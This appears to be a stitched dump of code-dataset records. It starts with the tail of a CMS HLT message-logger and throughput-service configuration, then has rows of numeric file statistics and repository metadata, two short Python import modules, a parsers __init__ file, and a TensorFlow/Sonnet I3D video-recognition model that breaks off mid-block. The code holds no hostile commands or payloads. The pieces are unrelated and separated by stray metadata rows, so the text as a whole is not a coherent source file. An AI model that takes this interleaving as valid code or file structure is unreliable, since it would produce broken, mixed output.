'hltHITPixelTracksHB',
'hltCtfL1SeededWithMaterialTracks',
'hltRegionalTracksForL3MuonIsolation',
'hltSiPixelClusters',
'hltActivityStartUpElectronPixelSeeds',
'hltLightPFTracks',
'hltPixelVertices3DbbPhi',
'hltL3MuonsIOHit',
'hltPixelTracks',
'hltSiPixelDigis',
'hltL3MuonsOIHit',
'hltL1SeededElectronGsfTracks',
'hltL1SeededStartUpElectronPixelSeeds',
'hltBLifetimeRegionalCtfWithMaterialTracksbbPhiL1FastJetFastPV',
'hltCtfActivityWithMaterialTracks' ),
suppressFwkInfo = cms.untracked.vstring( ),
suppressInfo = cms.untracked.vstring( ),
suppressDebug = cms.untracked.vstring( ),
debugModules = cms.untracked.vstring( ),
cerr = cms.untracked.PSet(
INFO = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),
noTimeStamps = cms.untracked.bool( False ),
FwkReport = cms.untracked.PSet(
reportEvery = cms.untracked.int32( 1 ),
limit = cms.untracked.int32( 0 )
),
default = cms.untracked.PSet( limit = cms.untracked.int32( 10000000 ) ),
Root_NoDictionary = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),
FwkJob = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),
FwkSummary = cms.untracked.PSet(
reportEvery = cms.untracked.int32( 1 ),
limit = cms.untracked.int32( 10000000 )
),
threshold = cms.untracked.string( "INFO" ),
),
suppressError = cms.untracked.vstring( 'hltOnlineBeamSpot',
'hltL3MuonCandidates',
'hltL3TkTracksFromL2OIState',
'hltPFJetCtfWithMaterialTracks',
'hltL3TkTracksFromL2IOHit',
'hltL3TkTracksFromL2OIHit' )
)
ThroughputService = cms.Service( "ThroughputService",
eventRange = cms.untracked.uint32( 10000 ),
eventResolution = cms.untracked.uint32( 1 ),
printEventSummary = cms.untracked.bool( False ),
enableDQM = cms.untracked.bool( True ),
dqmPathByProcesses = cms.untracked.bool( False ),
dqmPath = cms.untracked.string( "HLT/Throughput" ),
timeRange = cms.untracked.double( 60000.0 ),
timeResolution = cms.untracked.double( 5.828 )
)
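# A minimal sketch (not part of the HLT menu above) of how ESProducer blocks such as
# hltESPKFUpdator are normally attached to a cms.Process and inspected; the process
# name "HLT" used here is an assumption.
#
#   import FWCore.ParameterSet.Config as cms
#   process = cms.Process( "HLT" )
#   process.hltESPKFUpdator = cms.ESProducer( "KFUpdatorESProducer",
#       ComponentName = cms.string( "hltESPKFUpdator" )
#   )
#   print( process.dumpPython() )   # writes the configuration back out in the same format used above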
| 44.672243
| 131
| 0.742549
| 30,547
| 320,434
| 7.594428
| 0.067077
| 0.049774
| 0.024415
| 0.018673
| 0.813123
| 0.805429
| 0.768047
| 0.75815
| 0.74593
| 0.740757
| 0
| 0.060904
| 0.143618
| 320,434
| 7,172
| 132
| 44.678472
| 0.784486
| 0.000318
| 0
| 0.752549
| 1
| 0
| 0.266718
| 0.234816
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00014
| 0
| 0.00014
| 0.000698
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ab3042eaebbb9fa9a769b95786f6268255448380
| 79
|
py
|
Python
|
finitewave/cpuwave3D/model/luo_rudy91_3d/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | null | null | null |
finitewave/cpuwave3D/model/luo_rudy91_3d/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | null | null | null |
finitewave/cpuwave3D/model/luo_rudy91_3d/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | 2
|
2021-10-05T13:38:56.000Z
|
2022-03-05T15:58:08.000Z
|
from finitewave.cpuwave3D.model.luo_rudy91_3d.luo_rudy91_3d import LuoRudy913D
| 39.5
| 78
| 0.898734
| 12
| 79
| 5.583333
| 0.75
| 0.268657
| 0.328358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 0.050633
| 79
| 1
| 79
| 79
| 0.76
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ab395a42e8f312446e5087de9cf66c1ac9e414a1
| 73
|
py
|
Python
|
loghandler/modules/__init__.py
|
math280h/loghandler
|
7e752493df91e49b3b205fda2829e6e7b8cc050c
|
[
"MIT"
] | 2
|
2021-11-05T17:56:33.000Z
|
2021-11-07T01:58:01.000Z
|
loghandler/modules/__init__.py
|
math280h/loghandler
|
7e752493df91e49b3b205fda2829e6e7b8cc050c
|
[
"MIT"
] | 33
|
2021-11-05T02:09:29.000Z
|
2022-03-23T11:09:45.000Z
|
loghandler/modules/__init__.py
|
math280h/loghandler
|
7e752493df91e49b3b205fda2829e6e7b8cc050c
|
[
"MIT"
] | null | null | null |
import loghandler.modules.elasticsearch
import loghandler.modules.stdout
| 24.333333
| 39
| 0.890411
| 8
| 73
| 8.125
| 0.625
| 0.492308
| 0.707692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054795
| 73
| 2
| 40
| 36.5
| 0.942029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
db4b4cdf8c7983277974c6738546ec921665546a
| 260
|
py
|
Python
|
iridauploader/parsers/__init__.py
|
COMBAT-SARS-COV-2/irida-uploader
|
b9d04d187d6a5a9fdcaef5b27135965ffac99db0
|
[
"Apache-2.0"
] | 7
|
2019-01-25T16:56:11.000Z
|
2021-01-12T15:32:08.000Z
|
iridauploader/parsers/__init__.py
|
COMBAT-SARS-COV-2/irida-uploader
|
b9d04d187d6a5a9fdcaef5b27135965ffac99db0
|
[
"Apache-2.0"
] | 80
|
2019-01-29T14:54:26.000Z
|
2022-03-25T18:51:51.000Z
|
iridauploader/parsers/__init__.py
|
COMBAT-SARS-COV-2/irida-uploader
|
b9d04d187d6a5a9fdcaef5b27135965ffac99db0
|
[
"Apache-2.0"
] | 9
|
2019-03-14T09:58:05.000Z
|
2022-01-06T20:14:45.000Z
|
from iridauploader.parsers.base_parser import BaseParser
from iridauploader.parsers.parsers import supported_parsers
from iridauploader.parsers.parsers import parser_factory
from iridauploader.parsers import exceptions
from iridauploader.parsers import common
| 43.333333
| 59
| 0.892308
| 31
| 260
| 7.387097
| 0.354839
| 0.371179
| 0.524017
| 0.270742
| 0.323144
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 260
| 5
| 60
| 52
| 0.954167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
db706b5658548649e430078889dd1e59f014c664
| 58,287
|
py
|
Python
|
model_training/i3d.py
|
oulutan/ActorConditionedAttentionMaps
|
67baf36aad3c2d3db3912bdd96f43ccf988ee58e
|
[
"MIT"
] | 23
|
2019-12-19T13:59:04.000Z
|
2021-09-16T08:59:17.000Z
|
model_training/i3d.py
|
oulutan/ActorConditionedAttentionMaps
|
67baf36aad3c2d3db3912bdd96f43ccf988ee58e
|
[
"MIT"
] | 19
|
2020-01-28T23:12:25.000Z
|
2022-02-10T00:40:42.000Z
|
model_training/i3d.py
|
oulutan/ActorConditionedAttentionMaps
|
67baf36aad3c2d3db3912bdd96f43ccf988ee58e
|
[
"MIT"
] | 8
|
2019-12-19T15:35:43.000Z
|
2021-10-08T21:11:39.000Z
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Inception-v1 Inflated 3D ConvNet used for Kinetics CVPR paper.
The model is introduced in:
Quo Vadis, Action Recognition? A New Model and the Kinetics Dataset
Joao Carreira, Andrew Zisserman
https://arxiv.org/pdf/1705.07750v1.pdf.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sonnet as snt
import tensorflow as tf
##### Wrapper Begins
# WEIGHTS_PATH = './models/weights/'
# import os
# MAIN_FOLDER = os.environ['AVA_DIR']
# WEIGHTS_PATH = MAIN_FOLDER + '/model_training/models/weights/'
def inference(input_image, is_training, num_classes, end_point='Logits', channel_mult=1.0, lateral=False):
dropout_keep = tf.cond(is_training, lambda: 0.2, lambda: 1.0)
processed_input = preprocess(input_image)
with tf.variable_scope('I3D_Model'):
if not lateral:
model = InceptionI3d(num_classes, spatial_squeeze=True, final_endpoint=end_point)
else:
model = LateralInceptionI3d(num_classes, spatial_squeeze=True, final_endpoint=end_point)
logits, endpoints = model(processed_input, is_training=is_training, dropout_keep_prob=dropout_keep, channel_mult=channel_mult)
return logits, endpoints
def preprocess(input_seq):
# crop_mean = np.load(WEIGHTS_PATH + 'c3d_crop_mean.npy')
# output_seq = input_seq - crop_mean
# scale between [-1,+1]
output_seq = input_seq / 128.0 - 1.0
# scale
# output_seq = output_seq / 255.0
return output_seq
def initialize_weights(sess, path_to_weights):
i3d_var = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='I3D_Model')
var_map = {}
for variable in i3d_var:
# if variable.name.endswith('w:0') or variable.name.endswith('beta:0'):
if 'Adam' not in variable.name:
if 'lateral' not in variable.name:
map_name = variable.name.replace(':0', '')
map_name = map_name.replace('I3D_Model', 'RGB')
var_map[map_name] = variable
rgb_saver = tf.train.Saver(var_list=var_map, reshape=True)
#path_to_weights = weights_path + 'i3d_rgb_imagenet/model.ckpt'
rgb_saver.restore(sess, path_to_weights)
print('Restored i3d head weights from %s ' % path_to_weights)
def initialize_tail(sess, weights_path):
# weights_path = MAIN_FOLDER + '/model_training/models/weights/'
# path_to_weights = weights_path + 'i3d_rgb_imagenet/model.ckpt'
## need var_map keys as this
# RGB/inception_i3d/Mixed_3c/Branch_2/Conv3d_0b_3x3/conv_3d/w
tail_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Tail_I3D')
var_map = {}
for variable in tail_vars:
# if variable.name.endswith('w:0') or variable.name.endswith('beta:0'):
if 'Adam' not in variable.name:
map_name = variable.name.replace(':0', '')
map_name = map_name.replace('Tail_I3D', 'RGB/inception_i3d')
var_map[map_name] = variable
if var_map.keys():
tail_saver = tf.train.Saver(var_list=var_map, reshape=True)
tail_saver.restore(sess, weights_path)
print('Restored i3d tail weights from %s ' % weights_path)
else:
print('Tail did not initialize anything')
def initialize_all_i3d_from_ckpt(sess, ckpt_file):
head_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='RGB/inception_i3d')
tail_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Tail_I3D')
cls_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='CLS_Logits')
var_list = head_vars + tail_vars + cls_vars
i3d_loader = tf.train.Saver(var_list=var_list)
i3d_loader.restore(sess, ckpt_file)
print('Restored I3D head - tail and CLS_Logits from ckpt %s' % ckpt_file)
###### Wrapper Ends
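# A usage sketch for the wrapper functions above (not part of the original file); the
# placeholder shapes and the checkpoint path are assumptions based on the commented-out
# weight paths earlier in this file.
#
#   frames = tf.placeholder(tf.float32, [1, 16, 224, 224, 3])   # batch x time x H x W x RGB
#   training = tf.placeholder(tf.bool, [])                      # scalar flag consumed by tf.cond
#   logits, end_points = inference(frames, training, num_classes=400)
#   with tf.Session() as sess:
#     sess.run(tf.global_variables_initializer())
#     initialize_weights(sess, './models/weights/i3d_rgb_imagenet/model.ckpt')
#     # clip: a NumPy array matching the placeholder shape, raw pixel values (preprocess() rescales them)
#     out = sess.run(logits, feed_dict={frames: clip, training: False})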
class Unit3D(snt.AbstractModule):
"""Basic unit containing Conv3D + BatchNorm + non-linearity."""
def __init__(self, output_channels,
kernel_shape=(1, 1, 1),
stride=(1, 1, 1),
activation_fn=tf.nn.relu,
use_batch_norm=True,
use_bias=False,
name='unit_3d'):
"""Initializes Unit3D module."""
super(Unit3D, self).__init__(name=name)
self._output_channels = output_channels
self._kernel_shape = kernel_shape
self._stride = stride
self._use_batch_norm = use_batch_norm
self._activation_fn = activation_fn
self._use_bias = use_bias
def _build(self, inputs, is_training):
"""Connects the module to inputs.
Args:
inputs: Inputs to the Unit3D component.
is_training: whether to use training mode for snt.BatchNorm (boolean).
Returns:
Outputs from the module.
"""
net = snt.Conv3D(output_channels=self._output_channels,
kernel_shape=self._kernel_shape,
stride=self._stride,
padding=snt.SAME,
use_bias=self._use_bias)(inputs)
if self._use_batch_norm:
bn = snt.BatchNorm()
#################### Warning batchnorm is hard coded to is_training=False #################
# net = bn(net, is_training=is_training, test_local_stats=False)
net = bn(net, is_training=False, test_local_stats=False)
if self._activation_fn is not None:
net = self._activation_fn(net)
return net
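# A small standalone sketch of Unit3D (hypothetical, not in the original file), based on the
# __init__ and _build signatures above:
#   unit = Unit3D(output_channels=64, kernel_shape=(3, 3, 3), name='example_unit')
#   features = unit(video, is_training=False)   # video: [batch, time, height, width, channels]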
class InceptionI3d(snt.AbstractModule):
"""Inception-v1 I3D architecture.
The model is introduced in:
Quo Vadis, Action Recognition? A New Model and the Kinetics Dataset
Joao Carreira, Andrew Zisserman
https://arxiv.org/pdf/1705.07750v1.pdf.
See also the Inception architecture, introduced in:
Going deeper with convolutions
Christian Szegedy, Wei Liu, Yangqing Jia, Pierre Sermanet, Scott Reed,
Dragomir Anguelov, Dumitru Erhan, Vincent Vanhoucke, Andrew Rabinovich.
http://arxiv.org/pdf/1409.4842v1.pdf.
"""
# Endpoints of the model in order. During construction, all the endpoints up
# to a designated `final_endpoint` are returned in a dictionary as the
# second return value.
VALID_ENDPOINTS = (
'Conv3d_1a_7x7',
'MaxPool3d_2a_3x3',
'Conv3d_2b_1x1',
'Conv3d_2c_3x3',
'MaxPool3d_3a_3x3',
'Mixed_3b',
'Mixed_3c',
'MaxPool3d_4a_3x3',
'Mixed_4b',
'Mixed_4c',
'Mixed_4d',
'Mixed_4e',
'Mixed_4f',
'MaxPool3d_5a_2x2',
'Mixed_5b',
'Mixed_5c',
'Logits',
'Predictions',
)
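  # For example (a hypothetical call, not part of the original file), building the model only
  # up to 'Mixed_4f' returns that tensor plus every earlier endpoint in the dictionary:
  #   model = InceptionI3d(final_endpoint='Mixed_4f')
  #   mixed_4f, end_points = model(clip, is_training=False)   # e.g. end_points['Mixed_3b'], ...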
def __init__(self, num_classes=400, spatial_squeeze=True,
final_endpoint='Logits', name='inception_i3d'):
"""Initializes I3D model instance.
Args:
num_classes: The number of outputs in the logit layer (default 400, which
matches the Kinetics dataset).
spatial_squeeze: Whether to squeeze the spatial dimensions for the logits
before returning (default True).
final_endpoint: The model contains many possible endpoints.
`final_endpoint` specifies the last endpoint for the model to be built
up to. In addition to the output at `final_endpoint`, all the outputs
at endpoints up to `final_endpoint` will also be returned, in a
dictionary. `final_endpoint` must be one of
InceptionI3d.VALID_ENDPOINTS (default 'Logits').
name: A string (optional). The name of this module.
Raises:
ValueError: if `final_endpoint` is not recognized.
"""
if final_endpoint not in self.VALID_ENDPOINTS:
raise ValueError('Unknown final endpoint %s' % final_endpoint)
super(InceptionI3d, self).__init__(name=name)
self._num_classes = num_classes
self._spatial_squeeze = spatial_squeeze
self._final_endpoint = final_endpoint
def _build(self, inputs, is_training, dropout_keep_prob=1.0, channel_mult=1.0):
"""Connects the model to inputs.
Args:
inputs: Inputs to the model, which should have dimensions
`batch_size` x `num_frames` x 224 x 224 x `num_channels`.
is_training: whether to use training mode for snt.BatchNorm (boolean).
dropout_keep_prob: Probability of keeping a unit in the tf.nn.dropout
layer (float in (0, 1]; 1.0 disables dropout).
channel_mult: Multiplier applied to the number of output channels of
every convolution (default 1.0; keep it integer-valued so the channel
counts stay integral).
Returns:
A tuple consisting of:
1. Network output at location `self._final_endpoint`.
2. Dictionary containing all endpoints up to `self._final_endpoint`,
indexed by endpoint name.
Raises:
ValueError: if `self._final_endpoint` is not recognized.
"""
if self._final_endpoint not in self.VALID_ENDPOINTS:
raise ValueError('Unknown final endpoint %s' % self._final_endpoint)
net = inputs
end_points = {}
end_point = 'Conv3d_1a_7x7'
net = Unit3D(output_channels=channel_mult*64, kernel_shape=[7, 7, 7],
stride=[2, 2, 2], name=end_point)(net, is_training=is_training)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_2a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 1, 3, 3, 1], strides=[1, 1, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Conv3d_2b_1x1'
net = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name=end_point)(net, is_training=is_training)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Conv3d_2c_3x3'
net = Unit3D(output_channels=channel_mult*192, kernel_shape=[3, 3, 3],
name=end_point)(net, is_training=is_training)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_3a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 1, 3, 3, 1], strides=[1, 1, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_3b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*96, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*16, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_3c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*192, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*96, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_4a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1], strides=[1, 2, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*192, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*96, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*208, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*16, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*48, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*112, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*224, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*24, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4d'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*256, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*24, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4e'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*112, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*144, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*288, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4f'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_5a_2x2'
net = tf.nn.max_pool3d(net, ksize=[1, 2, 2, 2, 1], strides=[1, 2, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0a_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
